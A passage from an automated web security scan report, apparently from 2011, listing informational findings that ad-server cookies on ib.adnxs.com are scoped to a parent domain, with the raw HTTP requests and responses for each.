Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIiXoQChgBIAEoATD_1IztBBD_1IztBBgA; acb816160=5_[r^208WM6[kCcE/qX3b13VQ?enc=____fxSu8z9mZmamRbbxPwAAAKCZmQFAZmZmpkW28T8AAACAFK7zP6FOfHPNtdQt8f5MdWfsOnh_KqNNAAAAAMY5AwA3AQAAfAAAABkAAACfsAMAoVsAAAEAAABVU0QAVVNEACwB-gCqAQAA_gEBAgUCAAUAAAAAgyXJcAAAAAA.&tt_code=cm.foxnews&udj=updateSpendCreativeRecord%28198711%29&cnd=%7B%5C%22m6ClientId%5C%22:7197483837877830092,%5C%22transactionId%5C%22:12085950884050564,%5C%22marketerId%5C%22:803,%5C%22campaignId%5C%22:3502,%5C%22spendId%5C%22:29270,%5C%22spendWeight%5C%22:1230,%5C%22creativeId%5C%22:5778,%5C%22spendCreativeId%5C%22:198711,%5C%22adProfileId%5C%22:290%7D&custom_macro=NATIVE_SPEND_ID%5E29270%5ENATIVE_INVENTORY_ID%5E2677%5ENATIVE_SECTION_ID%5E56%5ENATIVE_PUBLISHER_ID%5E551%5ESOURCEURLENC%5Ehttp://collective-exchange.com%7CnotifyServer=asd168.sd.pl.pvt%7CnotifyPort=8080%7Cbid=1.2300000190734863%7CtId=12085950884050564%5EMEDIA6_DATA%5Efoo=bar; sess=1; uuid2=8663496762294337265; anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9!z6W0Jrx!wQ.y=fCzU_Fs2'gkKKA]$O/KPf+4#*[KxO?)Y+Ak9VRY_MNh'tM#U*cRYEl@2:-O`/[wF!*+([77te'#0GB_^*%p-G=(Y`j^:P![4#GOC0ScY4Jwaue1E-1EQ$(U65?I_<[c2-MxCu29ZR'!lUHN)-0<$VDu]IKM.kOO7].tJEH.9>4=0r(J`qtK'J

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 16:31:18 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:31:18 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:31:18 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ!z6W0Jrx!wQ.y=fCzU_Fs2'gkKKA]$O/KPf+4#*[KxO?)Y+Ak9VRY_MNh'tM#U*cRYEl@2:-O`/[wF!*+([77te'#0GB_^*%p-G=(Y`j^:P![4#GOC0ScY4Jwaue1E-1EQ$(U65?I_<[c2-MxCu29ZR'!lUHN)-0<$VDu]IKM.kOO7].tJEH.9>4=13'iq:^cp/u%pqS!'zjghR!vJ; path=/; expires=Sun, 10-Jul-2011 16:31:18 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 11 Apr 2011 16:31:18 GMT
Content-Length: 5430

(function(){var flashAd='<OBJECT id="5775370096474326942" data="http://cdn.adnxs.com/p/a2/28/8f/c6/a2288fc65ffab6cf7a66ad8e31d4ea6e.swf" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="300
...[SNIP]...
5.67. http://ib.adnxs.com/click/4XoUrkfh9j_hehSuR-H2PwAAAMDMzAhAexSuR-H6EUB7FK5H4foRQGyzTtWol9w48f5MdWfsOnh2bqRNAAAAABUbAAC1AAAANQEAAAIAAADXfgQA0WMAAAEAAABVU0QAVVNEACwB-gC1GHIAoA8BAQUCAAQAAAAAuSbBxwAAAAA./cnd=!aBajcAjsLBDX_REYACDRxwEocjFmZmY-4foRQEITCAAQABgAIAEo_v__________AUgAUABYtTFgAGi1Ag../referrer=http%3A%2F%2Fwww.mvtimes.com%2Fmarthas-vineyard%2Fon-island.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DByl0zdm6kTf_uL83P6Aa8svGiCu_675oCp439xBrv8I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01NTk3ODc1MDQ2NTQwODA5sgEPd3d3Lm12dGltZXMuY29tugEKMzAweDI1MF9hc8gBCdoBNWh0dHA6Ly93d3cubXZ0aW1lcy5jb20vbWFydGhhcy12aW5leWFyZC9vbi1pc2xhbmQucGhwmAKWC8ACBMgCq4KlDqgDAegDsCroA7II9QMABABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtzEpohHrVWeJEJyiZUS6oseA0vyiQ%26client%3Dca-pub-5597875046540809%26adurl%3Dhttp://www.kwanzoo.com/widget/customized/2858/load  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /click/4XoUrkfh9j_hehSuR-H2PwAAAMDMzAhAexSuR-H6EUB7FK5H4foRQGyzTtWol9w48f5MdWfsOnh2bqRNAAAAABUbAAC1AAAANQEAAAIAAADXfgQA0WMAAAEAAABVU0QAVVNEACwB-gC1GHIAoA8BAQUCAAQAAAAAuSbBxwAAAAA./cnd=!aBajcAjsLBDX_REYACDRxwEocjFmZmY-4foRQEITCAAQABgAIAEo_v__________AUgAUABYtTFgAGi1Ag../referrer=http%3A%2F%2Fwww.mvtimes.com%2Fmarthas-vineyard%2Fon-island.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DByl0zdm6kTf_uL83P6Aa8svGiCu_675oCp439xBrv8I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01NTk3ODc1MDQ2NTQwODA5sgEPd3d3Lm12dGltZXMuY29tugEKMzAweDI1MF9hc8gBCdoBNWh0dHA6Ly93d3cubXZ0aW1lcy5jb20vbWFydGhhcy12aW5leWFyZC9vbi1pc2xhbmQucGhwmAKWC8ACBMgCq4KlDqgDAegDsCroA7II9QMABABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtzEpohHrVWeJEJyiZUS6oseA0vyiQ%26client%3Dca-pub-5597875046540809%26adurl%3Dhttp://www.kwanzoo.com/widget/customized/2858/load

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/4XoUrkfh9j_hehSuR-H2PwAAAMDMzAhAexSuR-H6EUB7FK5H4foRQGyzTtWol9w48f5MdWfsOnh2bqRNAAAAABUbAAC1AAAANQEAAAIAAADXfgQA0WMAAAEAAABVU0QAVVNEACwB-gC1GHIAoA8BAQUCAAQAAAAAuSbBxwAAAAA./cnd=!aBajcAjsLBDX_REYACDRxwEocjFmZmY-4foRQEITCAAQABgAIAEo_v__________AUgAUABYtTFgAGi1Ag../referrer=http%3A%2F%2Fwww.mvtimes.com%2Fmarthas-vineyard%2Fon-island.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DByl0zdm6kTf_uL83P6Aa8svGiCu_675oCp439xBrv8I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01NTk3ODc1MDQ2NTQwODA5sgEPd3d3Lm12dGltZXMuY29tugEKMzAweDI1MF9hc8gBCdoBNWh0dHA6Ly93d3cubXZ0aW1lcy5jb20vbWFydGhhcy12aW5leWFyZC9vbi1pc2xhbmQucGhwmAKWC8ACBMgCq4KlDqgDAegDsCroA7II9QMABABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtzEpohHrVWeJEJyiZUS6oseA0vyiQ%26client%3Dca-pub-5597875046540809%26adurl%3Dhttp://www.kwanzoo.com/widget/customized/2858/load HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=4XoUrkfh9j_hehSuR-H2PwAAAMDMzAhAexSuR-H6EUB7FK5H4foRQGyzTtWol9w48f5MdWfsOnh2bqRNAAAAABUbAAC1AAAANQEAAAIAAADXfgQA0WMAAAEAAABVU0QAVVNEACwB-gC1GHIAoA8BAgUCAAQAAAAAuibSxwAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DByl0zdm6kTf_uL83P6Aa8svGiCu_675oCp439xBrv8I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01NTk3ODc1MDQ2NTQwODA5sgEPd3d3Lm12dGltZXMuY29tugEKMzAweDI1MF9hc8gBCdoBNWh0dHA6Ly93d3cubXZ0aW1lcy5jb20vbWFydGhhcy12aW5leWFyZC9vbi1pc2xhbmQucGhwmAKWC8ACBMgCq4KlDqgDAegDsCroA7II9QMABABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtzEpohHrVWeJEJyiZUS6oseA0vyiQ%26client%3Dca-pub-5597875046540809%26adurl%3D&tt_code=&udj=uf%28%27a%27%2C+537%2C+1302621828%29%3Buf%28%27c%27%2C+5740%2C+1302621828%29%3Buf%28%27r%27%2C+294615%2C+1302621828%29%3Bppv%28783%2C+%274097316512389313388%27%2C+1302621828%2C+1303053828%2C+5740%2C+25553%29%3B&cnd=!aBajcAjsLBDX_REYACDRxwEocjFmZmY-4foRQEITCAAQABgAIAEo_v__________AUgAUABYtTFgAGi1Ag..&referrer=http://www.mvtimes.com/marthas-vineyard/on-island.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIiXoQChgCIAIoAjC27IztBAoSCNyOARAKGAEgASgBMODnjO0EELbsjO0EGAI.; acb917920=5_[r^kI/7Z6[kCcE/qX3Ib3`j?enc=____fxSu8z9mZmamRbbxPwAAAKCZmQFAZmZmpkW28T8AAACAFK7zP5U0V0-cDA0L8f5MdWfsOng2NqNNAAAAAMY5AwA3AQAAfAAAABkAAAChsAMAoVsAAAEAAABVU0QAVVNEANgCWgCqAQAANQIBAgUCAAUAAAAAWyI5nAAAAAA.&tt_code=cm.foxnews&udj=updateSpendCreativeRecord%28198712%29&cnd=%7B%5C%22m6ClientId%5C%22:7197483837877830092,%5C%22transactionId%5C%22:12488354959403911,%5C%22marketerId%5C%22:803,%5C%22campaignId%5C%22:3502,%5C%22spendId%5C%22:29270,%5C%22spendWeight%5C%22:1230,%5C%22creativeId%5C%22:5780,%5C%22spendCreativeId%5C%22:198712,%5C%22adProfileId%5C%22:290%7D&custom_macro=NATIVE_SPEND_ID%5E29270%5ENATIVE_INVENTORY_ID%5E2677%5ENATIVE_SECTION_ID%5E56%5ENATIVE_PUBLISHER_ID%5E551%5ESOURCEURLENC%5Ehttp://collective-exchange.com%7CnotifyServer=asd146.sd.pl.pvt%7CnotifyPort=8080%7Cbid=1.2300000190734863%7CtId=12488354959403911%5EMEDIA6_DATA%5Efoo=bar; sess=1; uuid2=8663496762294337265; anj=Kfu=8fG10QfQCe7?0P(*AuB-u**g1:XICZh#yJ3=qNXsr)=m!YD!I4Fb7]GM0N>*/6!c^k*WP?FYDMt2+(T:PL<CMg8kCUv+(TSbVDfRD_X=@-V9_7v47sx3(*/rO*J#$a!QZfrq8s0o[=6!-'Tc3_1V2(9#'3l3dVyFA>z4r91OiUmMO`J3N@@1Sh)wcc5fprDTIIb<!%WU0dtX(%[?aeV37]0Z06j@Hc2D-AkOKp9MHP9_Aw>0)LjhrT'h>+EPko'#:c5ikrrCjq8qS^*8<HA-`CLdb8B_go@)>8DN7tW=

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 13-Apr-2011 15:23:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Mon, 11-Jul-2011 15:23:38 GMT; domain=.adnxs.com; HttpOnly
Location: http://googleads.g.doubleclick.net/aclk?sa=l&ai=Byl0zdm6kTf_uL83P6Aa8svGiCu_675oCp439xBrv8I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01NTk3ODc1MDQ2NTQwODA5sgEPd3d3Lm12dGltZXMuY29tugEKMzAweDI1MF9hc8gBCdoBNWh0dHA6Ly93d3cubXZ0aW1lcy5jb20vbWFydGhhcy12aW5leWFyZC9vbi1pc2xhbmQucGhwmAKWC8ACBMgCq4KlDqgDAegDsCroA7II9QMABABE9QMgAAAAgAa-s939482e0DA&num=1&sig=AGiWqtzEpohHrVWeJEJyiZUS6oseA0vyiQ&client=ca-pub-5597875046540809&adurl=http://www.kwanzoo.com/widget/customized/2858/load
Date: Tue, 12 Apr 2011 15:23:38 GMT
Content-Length: 0

5.68. http://ib.adnxs.com/getuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=$UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIiXoQChgBIAEoATD_1IztBBD_1IztBBgA; acb816160=5_[r^208WM6[kCcE/qX3b13VQ?enc=____fxSu8z9mZmamRbbxPwAAAKCZmQFAZmZmpkW28T8AAACAFK7zP6FOfHPNtdQt8f5MdWfsOnh_KqNNAAAAAMY5AwA3AQAAfAAAABkAAACfsAMAoVsAAAEAAABVU0QAVVNEACwB-gCqAQAA_gEBAgUCAAUAAAAAgyXJcAAAAAA.&tt_code=cm.foxnews&udj=updateSpendCreativeRecord%28198711%29&cnd=%7B%5C%22m6ClientId%5C%22:7197483837877830092,%5C%22transactionId%5C%22:12085950884050564,%5C%22marketerId%5C%22:803,%5C%22campaignId%5C%22:3502,%5C%22spendId%5C%22:29270,%5C%22spendWeight%5C%22:1230,%5C%22creativeId%5C%22:5778,%5C%22spendCreativeId%5C%22:198711,%5C%22adProfileId%5C%22:290%7D&custom_macro=NATIVE_SPEND_ID%5E29270%5ENATIVE_INVENTORY_ID%5E2677%5ENATIVE_SECTION_ID%5E56%5ENATIVE_PUBLISHER_ID%5E551%5ESOURCEURLENC%5Ehttp://collective-exchange.com%7CnotifyServer=asd168.sd.pl.pvt%7CnotifyPort=8080%7Cbid=1.2300000190734863%7CtId=12085950884050564%5EMEDIA6_DATA%5Efoo=bar; anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ!z6W0Jrx!wQ.y=fCzU_Fs2'gkKKA]$O/KPf+4#*[KxO?)Y+Ak9VRY_MNh'tM#U*cRYEl@2:-O`/[wF!*+([77te'#0GB_^*%p-G=(Y`j^:P![4#GOC0ScY4Jwaue1E-1EQ$(U65?I_<[c2-MxCu29ZR'!lUHN)-0<$VDu]IKM.kOO7].tJEH.9>4=13'iq:^cp/u%pqS!'zjghR!vJ; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 16:41:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:41:21 GMT; domain=.adnxs.com; HttpOnly
Location: http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=8663496762294337265
Date: Mon, 11 Apr 2011 16:41:21 GMT
Content-Length: 0

5.69. http://ib.adnxs.com/getuidu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuidu

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuidu?http://a.rfihub.com/cm?apxuid=$UID&forward= HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; uuid2=8663496762294337265; anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=G#<hr/DaRTZQtI#Kto^D>7%hNCZAM!C0K<+MKcwNVSg=5pzOC9sG0dNO`q1.s%0ZSmbwg(RhLciH$_wXF3XdwLK.u3aCLlp@j>1hAYNN5fRn-rmn+)s$jI#-<oCZH-<fW]>8dl2O`L>m-GjsWE)wQW!g/$iN0C/R-zRMG(@QX[6sAVV2f_>.x0w4>`Ot/^cC@>9QVM'Y@6U@1+N3(

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 10-Apr-2011 12:35:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Fri, 08-Jul-2011 12:35:35 GMT; domain=.adnxs.com; HttpOnly
Location: http://a.rfihub.com/cm?apxuid=8663496762294337265&forward=
Date: Sat, 09 Apr 2011 12:35:35 GMT
Content-Length: 0

5.70. http://ib.adnxs.com/if  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /if?enc=4XoUrkfh9j_hehSuR-H2PwAAAMDMzAhAexSuR-H6EUB7FK5H4foRQGyzTtWol9w48f5MdWfsOnh2bqRNAAAAABUbAAC1AAAANQEAAAIAAADXfgQA0WMAAAEAAABVU0QAVVNEACwB-gC1GHIAoA8BAgUCAAQAAAAAuibSxwAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DByl0zdm6kTf_uL83P6Aa8svGiCu_675oCp439xBrv8I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01NTk3ODc1MDQ2NTQwODA5sgEPd3d3Lm12dGltZXMuY29tugEKMzAweDI1MF9hc8gBCdoBNWh0dHA6Ly93d3cubXZ0aW1lcy5jb20vbWFydGhhcy12aW5leWFyZC9vbi1pc2xhbmQucGhwmAKWC8ACBMgCq4KlDqgDAegDsCroA7II9QMABABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtzEpohHrVWeJEJyiZUS6oseA0vyiQ%26client%3Dca-pub-5597875046540809%26adurl%3D&tt_code=&udj=uf%28%27a%27%2C+537%2C+1302621828%29%3Buf%28%27c%27%2C+5740%2C+1302621828%29%3Buf%28%27r%27%2C+294615%2C+1302621828%29%3Bppv%28783%2C+%274097316512389313388%27%2C+1302621828%2C+1303053828%2C+5740%2C+25553%29%3B&cnd=!aBajcAjsLBDX_REYACDRxwEocjFmZmY-4foRQEITCAAQABgAIAEo_v__________AUgAUABYtTFgAGi1Ag..&referrer=http://www.mvtimes.com/marthas-vineyard/on-island.php HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5597875046540809&output=html&h=250&slotname=6415844257&w=300&lmt=1302639810&flash=10.2.154&url=http%3A%2F%2Fwww.mvtimes.com%2Fmarthas-vineyard%2Fon-island.php&dt=1302621810909&bpp=2&shv=r20110406&jsv=r20110406&prev_slotnames=4254550909&correlator=1302621810900&frm=0&adk=3606988145&ga_vid=1489843502.1302621734&ga_sid=1302621734&ga_hid=282251794&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.mvtimes.com%2Farchives%2F&fu=0&ifi=2&dtd=7&xpc=CSZzOTbuz0&p=http%3A//www.mvtimes.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIiXoQChgCIAIoAjC27IztBAoSCNyOARAKGAEgASgBMODnjO0EELbsjO0EGAI.; acb917920=5_[r^kI/7Z6[kCcE/qX3Ib3`j?enc=____fxSu8z9mZmamRbbxPwAAAKCZmQFAZmZmpkW28T8AAACAFK7zP5U0V0-cDA0L8f5MdWfsOng2NqNNAAAAAMY5AwA3AQAAfAAAABkAAAChsAMAoVsAAAEAAABVU0QAVVNEANgCWgCqAQAANQIBAgUCAAUAAAAAWyI5nAAAAAA.&tt_code=cm.foxnews&udj=updateSpendCreativeRecord%28198712%29&cnd=%7B%5C%22m6ClientId%5C%22:7197483837877830092,%5C%22transactionId%5C%22:12488354959403911,%5C%22marketerId%5C%22:803,%5C%22campaignId%5C%22:3502,%5C%22spendId%5C%22:29270,%5C%22spendWeight%5C%22:1230,%5C%22creativeId%5C%22:5780,%5C%22spendCreativeId%5C%22:198712,%5C%22adProfileId%5C%22:290%7D&custom_macro=NATIVE_SPEND_ID%5E29270%5ENATIVE_INVENTORY_ID%5E2677%5ENATIVE_SECTION_ID%5E56%5ENATIVE_PUBLISHER_ID%5E551%5ESOURCEURLENC%5Ehttp://collective-exchange.com%7CnotifyServer=asd146.sd.pl.pvt%7CnotifyPort=8080%7Cbid=1.2300000190734863%7CtId=12488354959403911%5EMEDIA6_DATA%5Efoo=bar; anj=Kfu=8fG6kGfQCe7?0P(*AuB-u**g1:XIDg1#yJ3=qNXsr)=m!YD!I4Fb7]GM0N>*/6!c^k*WP?FYDMt2+(T:PL<CMg8kCUv+(TSbVDfRD_X=@-V9_7v47sx3(*/rO*J#$a!QZfrq8s0o[=6!-'Tc3_1V2(9#'3l3dVyFA>z4r91OiUmMOaU_TIIb<!8`>]D>a##TqO#rgJ$n1Q-[+C^BnlV`k?U#36J=A%V>U+S7yTlnBPsg(_b6[$c5>2BrW4XfFt?<ZfG6[JyynB$LInC[[wQ6[Gb?W; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 13-Apr-2011 15:23:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Mon, 11-Jul-2011 15:23:38 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Mon, 11-Jul-2011 15:23:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG10QfQCe7?0P(*AuB-u**g1:XICZh#yJ3=qNXsr)=m!YD!I4Fb7]GM0N>*/6!c^k*WP?FYDMt2+(T:PL<CMg8kCUv+(TSbVDfRD_X=@-V9_7v47sx3(*/rO*J#$a!QZfrq8s0o[=6!-'Tc3_1V2(9#'3l3dVyFA>z4r91OiUmMO`J3N@@1Sh)wcc5fprDTIIb<!%WU0dtX(%[?aeV37]0Z06j@Hc2D-AkOKp9MHP9_Aw>0)LjhrT'h>+EPko'#:c5ikrrCjq8qS^*8<HA-`CLdb8B_go@)>8DN7tW=; path=/; expires=Mon, 11-Jul-2011 15:23:38 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 12 Apr 2011 15:23:38 GMT
Content-Length: 1203

<iframe id="kwcWidgetFrame" name="kwcWidgetFrame" frameborder="0" scrolling="no" marginwidth="0" marginheight="0" width="300" height="250" src="http://ib.adnxs.com/click/4XoUrkfh9j_hehSuR-H2PwAAAMDMzA
...[SNIP]...
5.71. http://ib.adnxs.com/mapuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=311&user=11f3c48b4c0582b&seg_code=noseg&ord=1302538879 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
